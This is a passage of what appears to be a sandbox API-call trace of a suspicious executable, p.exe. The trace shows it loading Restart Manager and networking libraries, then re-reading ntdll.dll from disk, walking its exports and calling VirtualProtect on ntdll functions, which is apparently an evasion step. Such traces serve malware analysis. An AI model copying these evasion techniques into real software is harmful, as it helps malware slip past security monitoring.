Size=0x34) returned 0xec5d80 [0052.955] RtlInitializeSListHead (in: ListHead=0x2827498 | out: ListHead=0x2827498) [0052.955] GetLastError () returned 0x0 [0052.956] SetLastError (dwErrCode=0x0) [0052.956] GetEnvironmentStringsW () returned 0xec5dc0* [0052.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x565) returned 0xec6898 [0052.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0xec6898, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0052.956] FreeEnvironmentStringsW (penv=0xec5dc0) returned 1 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x98) returned 0xec6e08 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x1f) returned 0xec5460 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x36) returned 0xec6ea8 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x37) returned 0xec6ee8 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x3c) returned 0xebc108 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x31) returned 0xec6f28 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x17) returned 0xebe868 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x24) returned 0xebdd90 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x14) returned 0xebe888 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0xd) returned 0xebd120 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x25) returned 0xec6f68 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x39) returned 0xebc150 [0052.956] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x18) returned 0xebe8a8 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x17) returned 0xebe8c8 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0xe) returned 0xebd138 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x69) returned 0xec5dc0 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x3e) returned 0xebc198 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x1b) returned 0xec5488 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x1d) returned 0xec54b0 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x48) returned 0xec1970 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x12) returned 0xebe8e8 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x18) returned 0xebe908 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x1b) returned 0xec54d8 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x24) returned 0xec6f98 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x29) returned 0xec5e38 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x1e) returned 0xec5500 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x41) returned 0xec19c0 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x17) returned 0xebe928 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0xf) returned 0xebd150 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x16) returned 0xebe948 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x2a) returned 0xec5e70 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x29) returned 0xec5ea8 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x15) returned 0xebe968 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x1e) returned 0xec5528 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x2a) returned 0xec5ee0 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x12) returned 0xebe988 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x18) returned 0xebe9a8 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x46) returned 0xec1a10 [0052.957] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec6898 | out: hHeap=0xea0000) returned 1 [0052.957] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x800) returned 0xec5f18 [0052.958] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0052.958] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2813fe2) returned 0x40d1c8 [0052.958] GetStartupInfoW (in: lpStartupInfo=0x18f2b4 | out: lpStartupInfo=0x18f2b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0052.958] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x1000) returned 0xec6fc8 [0052.958] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0052.958] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77230000 [0052.959] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.959] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77c40000 [0052.959] LoadLibraryA (lpLibFileName="Rstrtmgr.dll") returned 0x753b0000 [0052.967] GetCurrentProcess () returned 0xffffffff [0053.300] GetCurrentProcess () returned 0xffffffff [0053.781] GetCurrentProcess () returned 0xffffffff [0053.988] GetCurrentProcess () returned 0xffffffff [0053.992] GetCurrentProcess () returned 0xffffffff [0054.102] GetCurrentProcess () returned 0xffffffff [0054.102] GetCurrentProcess () returned 0xffffffff [0054.103] GetCurrentProcess () returned 0xffffffff [0054.109] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x76620000 [0054.109] LoadLibraryA (lpLibFileName="OleAut32.dll") returned 0x76e40000 [0054.109] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0054.109] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0054.109] GetModuleFileNameW (in: hModule=0x77c40000, lpFilename=0x18efd8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0054.110] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0054.110] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0054.110] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0054.110] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0054.110] GetFileSize (in: hFile=0x13c, lpFileSizeHigh=0x18efcc | out: lpFileSizeHigh=0x18efcc*=0x0) returned 0x13b740 [0054.110] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0054.110] CreateFileMappingW (hFile=0x13c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x140 [0054.111] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0054.111] MapViewOfFile (hFileMappingObject=0x140, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13b740) returned 0x30d0000 [0054.113] GetProcAddress (hModule=0x77c40000, lpProcName="A_SHAFinal") returned 0x77caacd7 [0054.115] GetProcAddress (hModule=0x77c40000, lpProcName="A_SHAInit") returned 0x77ca8d84 [0054.115] GetProcAddress (hModule=0x77c40000, lpProcName="A_SHAUpdate") returned 0x77caada7 [0054.116] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcAdjustCompletionListConcurrencyCount") returned 0x77ced359 [0054.116] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcFreeCompletionListMessage") returned 0x77cecfd8 [0054.117] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcGetCompletionListLastMessageInformation") returned 0x77ced0f4 [0054.117] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcGetCompletionListMessageAttributes") returned 0x77ced0c0 [0054.118] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcGetHeaderSize") returned 0x77cba09a [0054.118] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcGetMessageAttribute") returned 0x77cba02f [0054.119] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcGetMessageFromCompletionList") returned 0x77cece21 [0054.119] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcGetOutstandingCompletionListMessageCount") returned 0x77ced11b [0054.119] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcInitializeMessageAttribute") returned 0x77cba066 [0054.119] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcMaxAllowedMessageLength") returned 0x77ced37d [0054.119] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcRegisterCompletionList") returned 0x77ced2d4 [0054.119] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcRegisterCompletionListWorkerThread") returned 0x77ced13a [0054.119] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcRundownCompletionList") returned 0x77ced33d [0054.119] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcUnregisterCompletionList") returned 0x77ced321 [0054.120] GetProcAddress (hModule=0x77c40000, lpProcName="AlpcUnregisterCompletionListWorkerThread") returned 0x77ced215 [0054.120] GetProcAddress (hModule=0x77c40000, lpProcName="CsrAllocateCaptureBuffer") returned 0x77cecb0f [0054.121] GetProcAddress (hModule=0x77c40000, lpProcName="CsrAllocateMessagePointer") returned 0x77cecb2f [0054.121] GetProcAddress (hModule=0x77c40000, lpProcName="CsrCaptureMessageBuffer") returned 0x77cecb3f [0054.121] GetProcAddress (hModule=0x77c40000, lpProcName="CsrCaptureMessageMultiUnicodeStringsInPlace") returned 0x77cecbe8 [0054.121] GetProcAddress (hModule=0x77c40000, lpProcName="CsrCaptureMessageString") returned 0x77cecb4f [0054.121] GetProcAddress (hModule=0x77c40000, lpProcName="CsrCaptureTimeout") returned 0x77cecb5f [0054.121] GetProcAddress (hModule=0x77c40000, lpProcName="CsrClientCallServer") returned 0x77cecaff [0054.122] GetProcAddress (hModule=0x77c40000, lpProcName="CsrClientConnectToServer") returned 0x77c91a0d [0054.122] GetProcAddress (hModule=0x77c40000, lpProcName="CsrFreeCaptureBuffer") returned 0x77cecb1f [0054.122] GetProcAddress (hModule=0x77c40000, lpProcName="CsrGetProcessId") returned 0x77cecb92 [0054.122] GetProcAddress (hModule=0x77c40000, lpProcName="CsrIdentifyAlertableThread") returned 0x77cecaf5 [0054.123] GetProcAddress (hModule=0x77c40000, lpProcName="CsrSetPriorityClass") returned 0x77ce1a7f [0054.123] GetProcAddress (hModule=0x77c40000, lpProcName="CsrVerifyRegion") returned 0x77cecc64 [0054.123] GetProcAddress (hModule=0x77c40000, lpProcName="DbgBreakPoint") returned 0x77c5000c [0054.124] GetProcAddress (hModule=0x77c40000, lpProcName="DbgPrint") returned 0x77cba7a0 [0054.124] GetProcAddress (hModule=0x77c40000, lpProcName="DbgPrintEx") returned 0x77cb5af3 [0054.124] GetProcAddress (hModule=0x77c40000, lpProcName="DbgPrintReturnControlC") returned 0x77ced44d [0054.125] GetProcAddress (hModule=0x77c40000, lpProcName="DbgPrompt") returned 0x77ced388 [0054.125] GetProcAddress (hModule=0x77c40000, lpProcName="DbgQueryDebugFilterState") returned 0x77ced3ce [0054.125] GetProcAddress (hModule=0x77c40000, lpProcName="DbgSetDebugFilterState") returned 0x77ced3de [0054.125] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUiConnectToDbg") returned 0x77cdf6fb [0054.125] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUiContinue") returned 0x77cdf7a3 [0054.125] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUiConvertStateChangeStructure") returned 0x77cdf8cc [0054.126] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUiDebugActiveProcess") returned 0x77cdf88a [0054.126] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUiGetThreadDebugObject") returned 0x77cdf74d [0054.126] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUiIssueRemoteBreakin") returned 0x77cdf843 [0054.126] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUiRemoteBreakin") returned 0x77cdf7ea [0054.126] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUiSetThreadDebugObject") returned 0x77cdf75f [0054.126] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUiStopDebugging") returned 0x77cdf7c8 [0054.126] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUiWaitStateChange") returned 0x77cdf77c [0054.127] GetProcAddress (hModule=0x77c40000, lpProcName="DbgUserBreakPoint") returned 0x77c50008 [0054.127] GetProcAddress (hModule=0x77c40000, lpProcName="EtwCreateTraceInstanceId") returned 0x77d1ac04 [0054.128] GetProcAddress (hModule=0x77c40000, lpProcName="EtwDeliverDataBlock") returned 0x77ca154b [0054.128] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEnumerateProcessRegGuids") returned 0x77d1b157 [0054.128] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventActivityIdControl") returned 0x77caebaf [0054.129] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventEnabled") returned 0x77c788e2 [0054.129] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventProviderEnabled") returned 0x77d1acf6 [0054.129] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventRegister") returned 0x77c7f6ba [0054.130] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventUnregister") returned 0x77c99241 [0054.130] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventWrite") returned 0x77ca0c59 [0054.130] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventWriteEndScenario") returned 0x77d1b401 [0054.131] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventWriteEx") returned 0x77d1b254 [0054.131] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventWriteFull") returned 0x77d1b287 [0054.131] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventWriteNoRegistration") returned 0x77cb2220 [0054.131] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventWriteStartScenario") returned 0x77d1b2b7 [0054.131] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventWriteString") returned 0x77d1add4 [0054.131] GetProcAddress (hModule=0x77c40000, lpProcName="EtwEventWriteTransfer") returned 0x77caec65 [0054.131] GetProcAddress (hModule=0x77c40000, lpProcName="EtwGetTraceEnableFlags") returned 0x77ca1729 [0054.132] GetProcAddress (hModule=0x77c40000, lpProcName="EtwGetTraceEnableLevel") returned 0x77ca16f3 [0054.132] GetProcAddress (hModule=0x77c40000, lpProcName="EtwGetTraceLoggerHandle") returned 0x77ca168a [0054.132] GetProcAddress (hModule=0x77c40000, lpProcName="EtwLogTraceEvent") returned 0x77d1b4c7 [0054.132] GetProcAddress (hModule=0x77c40000, lpProcName="EtwNotificationRegister") returned 0x77c7f532 [0054.133] GetProcAddress (hModule=0x77c40000, lpProcName="EtwNotificationUnregister") returned 0x77c991ab [0054.133] GetProcAddress (hModule=0x77c40000, lpProcName="EtwProcessPrivateLoggerRequest") returned 0x77cb255d [0054.133] GetProcAddress (hModule=0x77c40000, lpProcName="EtwRegisterSecurityProvider") returned 0x77d1acc6 [0054.133] GetProcAddress (hModule=0x77c40000, lpProcName="EtwRegisterTraceGuidsA") returned 0x77ca848f [0054.133] GetProcAddress (hModule=0x77c40000, lpProcName="EtwRegisterTraceGuidsW") returned 0x77c7f843 [0054.133] GetProcAddress (hModule=0x77c40000, lpProcName="EtwReplyNotification") returned 0x77d1dbea [0054.134] GetProcAddress (hModule=0x77c40000, lpProcName="EtwSendNotification") returned 0x77cb6b7c [0054.134] GetProcAddress (hModule=0x77c40000, lpProcName="EtwSetMark") returned 0x77d1b777 [0054.134] GetProcAddress (hModule=0x77c40000, lpProcName="EtwTraceEventInstance") returned 0x77d1b532 [0054.134] GetProcAddress (hModule=0x77c40000, lpProcName="EtwTraceMessage") returned 0x77ca79b7 [0054.134] GetProcAddress (hModule=0x77c40000, lpProcName="EtwTraceMessageVa") returned 0x77ca79db [0054.134] GetProcAddress (hModule=0x77c40000, lpProcName="EtwUnregisterTraceGuids") returned 0x77c99286 [0054.134] GetProcAddress (hModule=0x77c40000, lpProcName="EtwWriteUMSecurityEvent") returned 0x77d1b051 [0054.135] GetProcAddress (hModule=0x77c40000, lpProcName="EtwpCreateEtwThread") returned 0x77d1e157 [0054.135] GetProcAddress (hModule=0x77c40000, lpProcName="EtwpGetCpuSpeed") returned 0x77cb7091 [0054.135] GetProcAddress (hModule=0x77c40000, lpProcName="EtwpNotificationThread") returned 0x77ca14f1 [0054.135] GetProcAddress (hModule=0x77c40000, lpProcName="EvtIntReportAuthzEventAndSourceAsync") returned 0x77d1eb79 [0054.135] GetProcAddress (hModule=0x77c40000, lpProcName="EvtIntReportEventAndSourceAsync") returned 0x77d1eb43 [0054.136] GetProcAddress (hModule=0x77c40000, lpProcName="ExpInterlockedPopEntrySListEnd") returned 0x77c726b3 [0054.136] GetProcAddress (hModule=0x77c40000, lpProcName="ExpInterlockedPopEntrySListFault") returned 0x77c726b1 [0054.136] GetProcAddress (hModule=0x77c40000, lpProcName="ExpInterlockedPopEntrySListResume") returned 0x77c7267b [0054.136] GetProcAddress (hModule=0x77c40000, lpProcName="KiFastSystemCall") returned 0x77c501e0 [0054.137] GetProcAddress (hModule=0x77c40000, lpProcName="KiFastSystemCallRet") returned 0x77c501e4 [0054.137] GetProcAddress (hModule=0x77c40000, lpProcName="KiIntSystemCall") returned 0x77c501f0 [0054.137] GetProcAddress (hModule=0x77c40000, lpProcName="KiRaiseUserExceptionDispatcher") returned 0x77c50184 [0054.137] GetProcAddress (hModule=0x77c40000, lpProcName="KiUserApcDispatcher") returned 0x77c50038 [0054.137] GetProcAddress (hModule=0x77c40000, lpProcName="KiUserCallbackDispatcher") returned 0x77c500ec [0054.137] GetProcAddress (hModule=0x77c40000, lpProcName="KiUserExceptionDispatcher") returned 0x77c50134 [0054.138] GetProcAddress (hModule=0x77c40000, lpProcName="LdrAccessResource") returned 0x77c81f10 [0054.138] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0054.138] VirtualProtect (in: lpAddress=0x77c81f10, dwSize=0x40, flNewProtect=0x40, lpflOldProtect=0x18efd4 | out: lpflOldProtect=0x18efd4*=0x20) returned 1 [0054.139] GetCurrentProcess () returned 0xffffffff [0054.139] VirtualProtect (in: lpAddress=0x77c81f10, dwSize=0x40, flNewProtect=0x20, lpflOldProtect=0x18efd0 | out: lpflOldProtect=0x18efd0*=0x40) returned 1 [0054.139] GetCurrentProcess () returned 0xffffffff [0055.096] GetProcAddress (hModule=0x77c40000, lpProcName="LdrAddLoadAsDataTable") returned 0x77c9ecc0 [0055.097] GetProcAddress (hModule=0x77c40000, lpProcName="LdrAddRefDll") returned 0x77c7ffdd [0055.098] GetProcAddress (hModule=0x77c40000, lpProcName="LdrDisableThreadCalloutsForDll") returned 0x77c80d76 [0055.098] GetProcAddress (hModule=0x77c40000, lpProcName="LdrEnumResources") returned 0x77cedd19 [0055.098] GetProcAddress (hModule=0x77c40000, lpProcName="LdrEnumerateLoadedModules") returned 0x77c7bf1f [0055.098] GetProcAddress (hModule=0x77c40000, lpProcName="LdrFindEntryForAddress") returned 0x77c9e982 [0055.098] GetProcAddress (hModule=0x77c40000, lpProcName="LdrFindResourceDirectory_U") returned 0x77cee107 [0055.099] GetProcAddress (hModule=0x77c40000, lpProcName="LdrFindResourceEx_U") returned 0x77c9b5d5 [0055.099] GetProcAddress (hModule=0x77c40000, lpProcName="LdrFindResource_U") returned 0x77c81f2d [0055.099] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0055.099] VirtualProtect (in: lpAddress=0x77c81f2d, dwSize=0x40, flNewProtect=0x40, lpflOldProtect=0x18efd4 | out: lpflOldProtect=0x18efd4*=0x20) returned 1 [0055.099] GetCurrentProcess () returned 0xffffffff [0055.100] VirtualProtect (in: lpAddress=0x77c81f2d, dwSize=0x40, flNewProtect=0x20, lpflOldProtect=0x18efd0 | out: lpflOldProtect=0x18efd0*=0x40) returned 1 [0055.100] GetCurrentProcess () returned 0xffffffff [0055.130] GetProcAddress (hModule=0x77c40000, lpProcName="LdrFlushAlternateResourceModules") returned 0x77cedf5b [0055.131] GetProcAddress (hModule=0x77c40000, lpProcName="LdrGetDllHandle") returned 0x77c6fcf7 [0055.131] GetProcAddress (hModule=0x77c40000, lpProcName="LdrGetDllHandleByMapping") returned 0x77c9ec37 [0055.132] GetProcAddress (hModule=0x77c40000, lpProcName="LdrGetDllHandleByName") returned 0x77c9cc25 [0055.132] GetProcAddress (hModule=0x77c40000, lpProcName="LdrGetDllHandleEx") returned 0x77c6fd18 [0055.132] GetProcAddress (hModule=0x77c40000, lpProcName="LdrGetFailureData") returned 0x77ce05c4 [0055.132] GetProcAddress (hModule=0x77c40000, lpProcName="LdrGetFileNameFromLoadAsDataTable") returned 0x77ced596 [0055.132] GetProcAddress (hModule=0x77c40000, lpProcName="LdrGetProcedureAddress") returned 0x77c701aa [0055.132] GetProcAddress (hModule=0x77c40000, lpProcName="LdrGetProcedureAddressEx") returned 0x77c701cb [0055.132] GetProcAddress (hModule=0x77c40000, lpProcName="LdrHotPatchRoutine") returned 0x77cdfbb4 [0055.133] GetProcAddress (hModule=0x77c40000, lpProcName="LdrInitShimEngineDynamic") returned 0x77cae118 [0055.133] GetProcAddress (hModule=0x77c40000, lpProcName="LdrInitializeThunk") returned 0x77c79e49 [0055.133] GetProcAddress (hModule=0x77c40000, lpProcName="LdrLoadAlternateResourceModule") returned 0x77cb6595 [0055.133] GetProcAddress (hModule=0x77c40000, lpProcName="LdrLoadAlternateResourceModuleEx") returned 0x77c8399a [0055.133] GetProcAddress (hModule=0x77c40000, lpProcName="LdrLoadDll") returned 0x77c7c43a [0055.134] GetProcAddress (hModule=0x77c40000, lpProcName="LdrLockLoaderLock") returned 0x77c76b95 [0055.134] GetProcAddress (hModule=0x77c40000, lpProcName="LdrOpenImageFileOptionsKey") returned 0x77ca3588 [0055.134] GetProcAddress (hModule=0x77c40000, lpProcName="LdrProcessRelocationBlock") returned 0x77cee9cf [0055.135] GetProcAddress (hModule=0x77c40000, lpProcName="LdrQueryImageFileExecutionOptions") returned 0x77c8c132 [0055.135] GetProcAddress (hModule=0x77c40000, lpProcName="LdrQueryImageFileExecutionOptionsEx") returned 0x77c8c159 [0055.135] GetProcAddress (hModule=0x77c40000, lpProcName="LdrQueryImageFileKeyOption") returned 0x77ca2fd2 [0055.135] GetProcAddress (hModule=0x77c40000, lpProcName="LdrQueryModuleServiceTags") returned 0x77ce04fe [0055.135] GetProcAddress (hModule=0x77c40000, lpProcName="LdrQueryProcessModuleInformation") returned 0x77ce04d4 [0055.135] GetProcAddress (hModule=0x77c40000, lpProcName="LdrRegisterDllNotification") returned 0x77cac8a5 [0055.136] GetProcAddress (hModule=0x77c40000, lpProcName="LdrRemoveLoadAsDataTable") returned 0x77c9faa2 [0055.136] GetProcAddress (hModule=0x77c40000, lpProcName="LdrResFindResource") returned 0x77c8e29c [0055.136] GetProcAddress (hModule=0x77c40000, lpProcName="LdrResFindResourceDirectory") returned 0x77c7da15 [0055.136] GetProcAddress (hModule=0x77c40000, lpProcName="LdrResGetRCConfig") returned 0x77c87c5f [0055.136] GetProcAddress (hModule=0x77c40000, lpProcName="LdrResRelease") returned 0x77ceef42 [0055.136] GetProcAddress (hModule=0x77c40000, lpProcName="LdrResSearchResource") returned 0x77c7cd5c [0055.137] GetProcAddress (hModule=0x77c40000, lpProcName="LdrRscIsTypeExist") returned 0x77c836dd [0055.137] GetProcAddress (hModule=0x77c40000, lpProcName="LdrSetAppCompatDllRedirectionCallback") returned 0x77ce04f4 [0055.137] GetProcAddress (hModule=0x77c40000, lpProcName="LdrSetDllManifestProber") returned 0x77c915f6 [0055.137] GetProcAddress (hModule=0x77c40000, lpProcName="LdrSetMUICacheType") returned 0x77cee0b3 [0055.137] GetProcAddress (hModule=0x77c40000, lpProcName="LdrShutdownProcess") returned 0x77c98e79 [0055.137] GetProcAddress (hModule=0x77c40000, lpProcName="LdrShutdownThread") returned 0x77c9d2f9 [0055.138] GetProcAddress (hModule=0x77c40000, lpProcName="LdrUnloadAlternateResourceModule") returned 0x77c9f991 [0055.138] GetProcAddress (hModule=0x77c40000, lpProcName="LdrUnloadAlternateResourceModuleEx") returned 0x77c9f9a9 [0055.138] GetProcAddress (hModule=0x77c40000, lpProcName="LdrUnloadDll") returned 0x77c811d7 [0055.138] GetProcAddress (hModule=0x77c40000, lpProcName="LdrUnlockLoaderLock") returned 0x77c76c3c [0055.138] GetProcAddress (hModule=0x77c40000, lpProcName="LdrUnregisterDllNotification") returned 0x77cb1bf4 [0055.138] GetProcAddress (hModule=0x77c40000, lpProcName="LdrVerifyImageMatchesChecksum") returned 0x77ce05cf [0055.139] GetProcAddress (hModule=0x77c40000, lpProcName="LdrVerifyImageMatchesChecksumEx") returned 0x77ce004a [0055.139] GetProcAddress (hModule=0x77c40000, lpProcName="LdrWx86FormatVirtualImage") returned 0x77ce5cd5 [0055.139] GetProcAddress (hModule=0x77c40000, lpProcName="LdrpResGetMappingSize") returned 0x77c7c9fc [0055.139] GetProcAddress (hModule=0x77c40000, lpProcName="LdrpResGetResourceDirectory") returned 0x77c7cbb8 [0055.140] GetProcAddress (hModule=0x77c40000, lpProcName="MD4Final") returned 0x77d1ab61 [0055.140] GetProcAddress (hModule=0x77c40000, lpProcName="MD4Init") returned 0x77d1aa14 [0055.140] GetProcAddress (hModule=0x77c40000, lpProcName="MD4Update") returned 0x77d1aa48 [0055.140] GetProcAddress (hModule=0x77c40000, lpProcName="MD5Final") returned 0x77cb29ac [0055.140] GetProcAddress (hModule=0x77c40000, lpProcName="MD5Init") returned 0x77cb2859 [0055.141] GetProcAddress (hModule=0x77c40000, lpProcName="MD5Update") returned 0x77cb2a3a [0055.142] GetProcAddress (hModule=0x77c40000, lpProcName="NtAcceptConnectPort") returned 0x77c60200 [0055.142] GetProcAddress (hModule=0x77c40000, lpProcName="NtAccessCheck") returned 0x77c60218 [0055.142] GetProcAddress (hModule=0x77c40000, lpProcName="NtAccessCheckAndAuditAlarm") returned 0x77c5fc58 [0055.142] GetProcAddress (hModule=0x77c40000, lpProcName="NtAccessCheckByType") returned 0x77c60230 [0055.143] GetProcAddress (hModule=0x77c40000, lpProcName="NtAccessCheckByTypeAndAuditAlarm") returned 0x77c60104 [0055.143] GetProcAddress (hModule=0x77c40000, lpProcName="NtAccessCheckByTypeResultList") returned 0x77c60248 [0055.143] GetProcAddress (hModule=0x77c40000, lpProcName="NtAccessCheckByTypeResultListAndAuditAlarm") returned 0x77c60260 [0055.143] GetProcAddress (hModule=0x77c40000, lpProcName="NtAccessCheckByTypeResultListAndAuditAlarmByHandle") returned 0x77c60278 [0055.143] GetProcAddress (hModule=0x77c40000, lpProcName="NtAddAtom") returned 0x77c5ff48 [0055.143] GetProcAddress (hModule=0x77c40000, lpProcName="NtAddBootEntry") returned 0x77c60290 [0055.143] GetProcAddress (hModule=0x77c40000, lpProcName="NtAddDriverEntry") returned 0x77c602a8 [0055.144] GetProcAddress (hModule=0x77c40000, lpProcName="NtAdjustGroupsToken") returned 0x77c602c0 [0055.144] GetProcAddress (hModule=0x77c40000, lpProcName="NtAdjustPrivilegesToken") returned 0x77c5feb0 [0055.144] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlertResumeThread") returned 0x77c602d8 [0055.144] GetProcAddress (hModule=0x77c40000, lpProcName="NtAlertThread") returned 0x77c602f4 [0055.144] GetProcAddress (hModule=0x77c40000, 